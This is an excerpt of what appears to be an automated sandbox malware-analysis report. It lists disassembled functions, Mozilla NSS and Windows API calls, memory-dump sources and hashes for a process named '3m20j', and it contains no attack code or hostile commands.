                                                                                                                                                                                                                                                            • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,?,?,?,?,?,6BF12403,00000010,?,6BF1990F,0000003B,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&), ref: 6BF19CA3
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000,?,?,?,?,?,6BF12403,00000010,?,6BF1990F,0000003B,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&,?,00000000), ref: 6BF19CEA
                                                                                                                                                                                                                                                            • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,?,?,?,?,?,?,?,?,6BF12403,00000010,?,6BF1990F), ref: 6BF19D26
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,6BF12403,00000010,?,6BF1990F,0000003B), ref: 6BF19D70
                                                                                                                                                                                                                                                            • strchr.VCRUNTIME140(6BF1990F,?), ref: 6BF19DA4
                                                                                                                                                                                                                                                            • PORT_ArenaGrow_Util.NSS3(6BF12403,?,00000000,?), ref: 6BF19DE7
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6BEC895A,00000000,?,00000000,?,00000000,?,00000000,?,6BEBF599,?,00000000), ref: 6BF2136A
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6BEC895A,00000000,?,00000000,?,00000000,?,00000000,?,6BEBF599,?,00000000), ref: 6BF2137E
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21340: PL_ArenaGrow.NSS3(?,6BEBF599,?,00000000,?,6BEC895A,00000000,?,00000000,?,00000000,?,00000000,?,6BEBF599,?), ref: 6BF213CF
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21340: PR_Unlock.NSS3(?,?,6BEC895A,00000000,?,00000000,?,00000000,?,00000000,?,6BEBF599,?,00000000), ref: 6BF2145C
                                                                                                                                                                                                                                                            • PR_snprintf.NSS3(00000010,00000004,%%%02X,?), ref: 6BF19E0D
                                                                                                                                                                                                                                                            • PORT_ArenaGrow_Util.NSS3(6BF12403,?,00000000,?), ref: 6BF19E52
                                                                                                                                                                                                                                                            • realloc.MOZGLUE(?,?), ref: 6BF19E76
                                                                                                                                                                                                                                                            • realloc.MOZGLUE(?,?), ref: 6BF19EA5
                                                                                                                                                                                                                                                            • PORT_ArenaGrow_Util.NSS3(6BF12403,00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BF12403), ref: 6BF19F15
                                                                                                                                                                                                                                                            • realloc.MOZGLUE(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6BF12403), ref: 6BF19F4A
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6BF12403), ref: 6BF19F6A
                                                                                                                                                                                                                                                            • PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,-00000001), ref: 6BF19FAB
                                                                                                                                                                                                                                                            • realloc.MOZGLUE(?,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BF19FC2
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6BF19FE2
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BF19FFA
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BF1A021
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BF1A040
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6BF12403), ref: 6BF1A052
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,6BF12403,00000010,?,6BF1990F,0000003B,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&), ref: 6BF1A078
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,6BF12403,00000010,?,6BF1990F,0000003B,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&,?,00000000,00000010), ref: 6BF1A08D
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Arena$Grow_Util$Errorrealloc$strlen$freememcpy$CriticalEnterGrowR_snprintfSectionUnlockValuestrchr
                                                                                                                                                                                                                                                            • String ID: %%%02X
                                                                                                                                                                                                                                                            • API String ID: 4704135-3569721977
                                                                                                                                                                                                                                                            • Opcode ID: 87442126b21472d4436ac6932255ab58fa0ac529493766113384121f3bed34f2
                                                                                                                                                                                                                                                            • Instruction ID: 306c05895d217efeeaf47cba3bd9fe84d0c47930914638e10cdb9350a3292a5e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87442126b21472d4436ac6932255ab58fa0ac529493766113384121f3bed34f2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0BE1E872E086169FDB10CF6CC88069BF7F9BF45354F148968D829A7251EB39E815CBE0
                                                                                                                                                                                                                                                            Function 6BEE99C0 Relevance: 47.7, APIs: 25, Strings: 2, Instructions: 457stringmemoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BEE9A6D
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(-000000F9), ref: 6BEE9A89
                                                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(68006A0F), ref: 6BEE9AA2
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6BEE9AB9
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000001,?,FFFFD003), ref: 6BEE9AD4
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,?,?,?,6BEE9F85,?,00000000,00000000,?,6BED3C7B), ref: 6BEE9B02
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BEE9BC5
                                                                                                                                                                                                                                                              • Part of subcall function 6BEDB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6BEE1397,00000000,?,6BEDCF93,5B5F5EC0,00000000,?,6BEE1397,?), ref: 6BEDB1CB
                                                                                                                                                                                                                                                              • Part of subcall function 6BEDB1A0: free.MOZGLUE(5B5F5EC0,?,6BEDCF93,5B5F5EC0,00000000,?,6BEE1397,?), ref: 6BEDB1D2
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6BEE9BDE
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6BEE9C29
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6BEE9C38
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6BEE9C49
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BEE9C5A
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6BEE9C9D
                                                                                                                                                                                                                                                            • PK11_IsLoggedIn.NSS3(00000000,00000000), ref: 6BEE9CCE
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BEE9CFC
                                                                                                                                                                                                                                                              • Part of subcall function 6BEE11C0: PR_NewLock.NSS3 ref: 6BEE1216
                                                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6BEE9D05
                                                                                                                                                                                                                                                            • CERT_IsCACert.NSS3(00000000,?), ref: 6BEE9D17
                                                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6BEE9E53
                                                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6BEE9E65
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BEE9E89
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(6BED3C7B), ref: 6BEE9E9D
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6BEE9EB5
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BEE9EC7
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BEE9ED7
                                                                                                                                                                                                                                                            • PK11_DoesMechanism.NSS3(00000000,00001011), ref: 6BEE9EEF
                                                                                                                                                                                                                                                              • Part of subcall function 6BF11560: TlsGetValue.KERNEL32(00000000,?,6BEE0844,?), ref: 6BF1157A
                                                                                                                                                                                                                                                              • Part of subcall function 6BF11560: EnterCriticalSection.KERNEL32(?,?,?,6BEE0844,?), ref: 6BF1158F
                                                                                                                                                                                                                                                              • Part of subcall function 6BF11560: PR_Unlock.NSS3(?,?,?,?,6BEE0844,?), ref: 6BF115B2
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free$strlen$Alloc_CriticalDestroySectionUtilmemcpy$ArenaEnterErrorK11_PublicUnlockValue$CertCertificateDeleteDoesLockLoggedMechanism
                                                                                                                                                                                                                                                            • String ID: ID $Cert
                                                                                                                                                                                                                                                            • API String ID: 249077162-1549779482
                                                                                                                                                                                                                                                            • Opcode ID: 8ad763f0afb460694360b873285a0f53371342b45fda4239bab77dc3dc4a9d78
                                                                                                                                                                                                                                                            • Instruction ID: 13333ca45ca50bddd2f68c53cfd2c1c2009926d252fef18b8568cf4c2e9df0f0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ad763f0afb460694360b873285a0f53371342b45fda4239bab77dc3dc4a9d78
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9CF1F9B9E002059BEB01CF78DC45BAEB7F4AF45308F244069E91997352EB39D916CBB1
                                                                                                                                                                                                                                                            Function 6BEE79F0 Relevance: 30.5, APIs: 20, Instructions: 455COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,6BFEAB28,000000FC), ref: 6BEE7A1E
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6BEE7A48
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BF6C2BF
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorValuememcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3044119603-0
                                                                                                                                                                                                                                                            • Opcode ID: cca4fbf37d08aaa16e46ea8a0084430f0d78be8b33d5d9dc7e9a2127808ab8d8
                                                                                                                                                                                                                                                            • Instruction ID: e9dc1865dbc22995f628e1ace3dfd96af81018372a263686269ec6166572fc7f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cca4fbf37d08aaa16e46ea8a0084430f0d78be8b33d5d9dc7e9a2127808ab8d8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D40273B1D002199FEB21CF64CC41BDAB7B5AF19308F1081E9E90DA7251E7759E96CFA0
                                                                                                                                                                                                                                                            Function 6BEFEA00 Relevance: 28.8, APIs: 19, Instructions: 304COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,6BF08C9F,00000000,00000000,?), ref: 6BEFEA29
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6BF208B4
                                                                                                                                                                                                                                                            • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,000000A0,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,6BF08C9F), ref: 6BEFEB01
                                                                                                                                                                                                                                                            • SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,6BFEC6C4), ref: 6BEFEB28
                                                                                                                                                                                                                                                            • SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BEFEBC6
                                                                                                                                                                                                                                                            • SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6BEFEBDE
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6BEFEBEB
                                                                                                                                                                                                                                                            • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000010,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,6BF08C9F), ref: 6BEFEC17
                                                                                                                                                                                                                                                            • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BEFEC2F
                                                                                                                                                                                                                                                            • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6BEFEC4B
                                                                                                                                                                                                                                                            • SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,6BFEC754), ref: 6BEFEC6D
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BEFEC7F
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BEFEC90
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BEFECA1
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BEFECBF
                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BEFECD4
                                                                                                                                                                                                                                                            • SECOID_CopyAlgorithmID_Util.NSS3(?,?,00000000), ref: 6BF091D5
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(-0000000C,00000000), ref: 6BF091E8
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6BF091F2
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BF091FB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Encode$Item_free$Integer_Unsigned$Zfree$Algorithm$CopyErrorFindTag_
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 899953378-0
                                                                                                                                                                                                                                                            • Opcode ID: 933424d5714ec3fb4e3177c55a1492bc6e93364cdb1a9efbf54efb01e03cdf03
                                                                                                                                                                                                                                                            • Instruction ID: 78c21432e571e0af9cbe1b34c9725015e1ff9bd23a67403216077af754a65eaa
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 933424d5714ec3fb4e3177c55a1492bc6e93364cdb1a9efbf54efb01e03cdf03
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3CA1E872A105055BEB20CFA9DC85BBE77ACEB44388F200479E81AD7391E63DE9528753
                                                                                                                                                                                                                                                            Function 6BEF0BA0 Relevance: 25.7, APIs: 17, Instructions: 242memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE0B3,00000000), ref: 6BEF0BFA
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BF6C2BF
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6BEF0C18
                                                                                                                                                                                                                                                            • PK11_HPKE_DestroyContext.NSS3(?,00000000), ref: 6BEF0C2E
                                                                                                                                                                                                                                                            • SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6BEF0C39
                                                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6BEF0C45
                                                                                                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6BEF0CC1
                                                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?), ref: 6BEF0CDA
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6BEF0D1B
                                                                                                                                                                                                                                                            • PK11_GenerateKeyPairWithOpFlags.NSS3 ref: 6BEF0D79
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE006,00000000), ref: 6BEF0DB2
                                                                                                                                                                                                                                                            • PK11_CreateContextBySymKey.NSS3(?,82000104,?,?), ref: 6BEF0DE4
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6BEF0DFE
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE064,00000000), ref: 6BEF0E2C
                                                                                                                                                                                                                                                            • SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6BEF0E38
                                                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6BEF0E44
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BEF0E7E
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BEF0EAE
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DestroyError$K11_$ContextPrivatePublicUtilfree$Alloc_CreateFindFlagsGeneratePairTag_ValueWithmemcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2510822978-0
                                                                                                                                                                                                                                                            • Opcode ID: 48bd3f5727c9ee6e448349a07ce4da24843adb5e5f4b1594dbb15d9b9e4d8d42
                                                                                                                                                                                                                                                            • Instruction ID: 5cb56d3513e7c6d34d0a86239eaaf6f533f6f0cae94a1b786e3189f6d697d88d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48bd3f5727c9ee6e448349a07ce4da24843adb5e5f4b1594dbb15d9b9e4d8d42
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A91C2B2904301AFDB108F68DC4170BBBE9AF84708F14892DF89997352E779E955CB92
                                                                                                                                                                                                                                                            Function 6BF4DA30 Relevance: 24.4, APIs: 16, Instructions: 379memorythreadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 6BF55B40: PR_GetIdentitiesLayer.NSS3 ref: 6BF55B56
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6BF4DA96
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6BF4DAB4
                                                                                                                                                                                                                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6BF4DACB
                                                                                                                                                                                                                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6BF4DB53
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1BE30: SECOID_FindOID_Util.NSS3(6BED311B,00000000,?,6BED311B,?), ref: 6BF1BE44
                                                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(00000040), ref: 6BF4DBCB
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6BF4DC35
                                                                                                                                                                                                                                                            • CERT_CertChainFromCert.NSS3(?,00000001,00000001), ref: 6BF4DC55
                                                                                                                                                                                                                                                            • SECITEM_DupArray.NSS3(00000000,?), ref: 6BF4DC9C
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6BF4DCCF
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6BF4DCE5
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6BF4DD1D
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6BF4DD8E
                                                                                                                                                                                                                                                            • SECKEY_CopyPrivateKey.NSS3(?), ref: 6BF4DD9F
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6BF4DE96
                                                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6BF4DEAA
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(?,00000000), ref: 6BF4DEC8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$ErrorItem_$Copy$AlgorithmCertTag_Zfree$Alloc_ArrayChainCurrentFindFromIdentitiesLayerPrivateThreadmemcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4267785400-0
                                                                                                                                                                                                                                                            • Opcode ID: 96e0b97102df5b6070a9a47eac2aa153c40c584061477fe3cfae8c46ceb3ade3
                                                                                                                                                                                                                                                            • Instruction ID: 9158b75dcecfaa369cb167468e2bcc7ff9489fe6877236b59f108abd527545ed
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96e0b97102df5b6070a9a47eac2aa153c40c584061477fe3cfae8c46ceb3ade3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CD1CFBBA443019BE700CF24D981B1BBBE4AF54708F0045A9ED599B363E779DD04CB92
                                                                                                                                                                                                                                                            Function 6BE41B80 Relevance: 21.4, APIs: 14, Instructions: 415networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BE41BA0
                                                                                                                                                                                                                                                            • PR_GetIdentitiesLayer.NSS3(?,00000000), ref: 6BE41CBB
                                                                                                                                                                                                                                                            • select.WSOCK32(00000000,?,?,?,00000000), ref: 6BE41E6B
                                                                                                                                                                                                                                                            • PR_GetIdentitiesLayer.NSS3(?,00000000,00000000,?,?,?,00000000), ref: 6BE41EB2
                                                                                                                                                                                                                                                            • __WSAFDIsSet.WSOCK32(?,?), ref: 6BE41EC8
